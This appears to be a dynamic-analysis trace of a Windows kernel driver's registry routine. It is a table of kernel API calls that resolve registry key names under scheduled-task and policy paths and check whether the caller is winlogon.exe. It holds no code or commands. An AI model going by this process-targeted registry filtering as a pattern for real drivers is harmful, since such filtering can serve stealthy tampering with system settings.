| ObQueryNameString | Object_ptr = 0xffffc000b9f825d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe2, ret_val_ptr_out = 0xffffe0003a763e10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9f825d0, Length = 0xe2, ObjectNameInfo_unk_out = 0xffffe0003a763e10, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763e10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9f825d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9f825d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe4, ret_val_ptr_out = 0xffffe0003a763f10 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9f825d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9f825d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe2, ret_val_ptr_out = 0xffffe0003a763e10 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9f825d0, Length = 0xe2, ObjectNameInfo_unk_out = 0xffffe0003a763e10, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763e10, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2b0d8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10a, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2adb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x108, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x108, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2adb8, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x6, ret_val_ptr_out = 0xffffe0003c634250 | ||||
| _wcsicmp | _String1 = SD, _String2 = ImagePath, ret_val_out = 10 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634250, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9f825d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9f825d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x7a, ret_val_ptr_out = 0xffffe0003c6341c0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9f825d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9f825d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x78, ret_val_ptr_out = 0xffffe0003a763520 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9f825d0, Length = 0x78, ObjectNameInfo_unk_out = 0xffffe0003a763520, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\.DEFAULT\Control Panel\International, DestinationString_out = \REGISTRY\USER\.DEFAULT\Control Panel\International | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763520, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 | ||||
| _wcsicmp | _String1 = \Control Panel\International, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -16 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003c6341c0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10a, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x108, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x108, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10a, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x108, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x108, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10a, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9be2800, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x108, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9be2800, Length = 0x108, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9f825d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9f825d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2afb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x10a, ret_val_ptr_out = 0xffffe0003a7664d0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9f825d0, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9f825d0, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x108, ret_val_ptr_out = 0xffffe0003a769010 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000b9f825d0, Length = 0x108, ObjectNameInfo_unk_out = 0xffffe0003a769010, ReturnLength_ptr_out = 0xffffd0002ed2ac98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UpdateOrchestrator | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769010, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7664d0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a4ee5d0 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a4ee180 | ||||
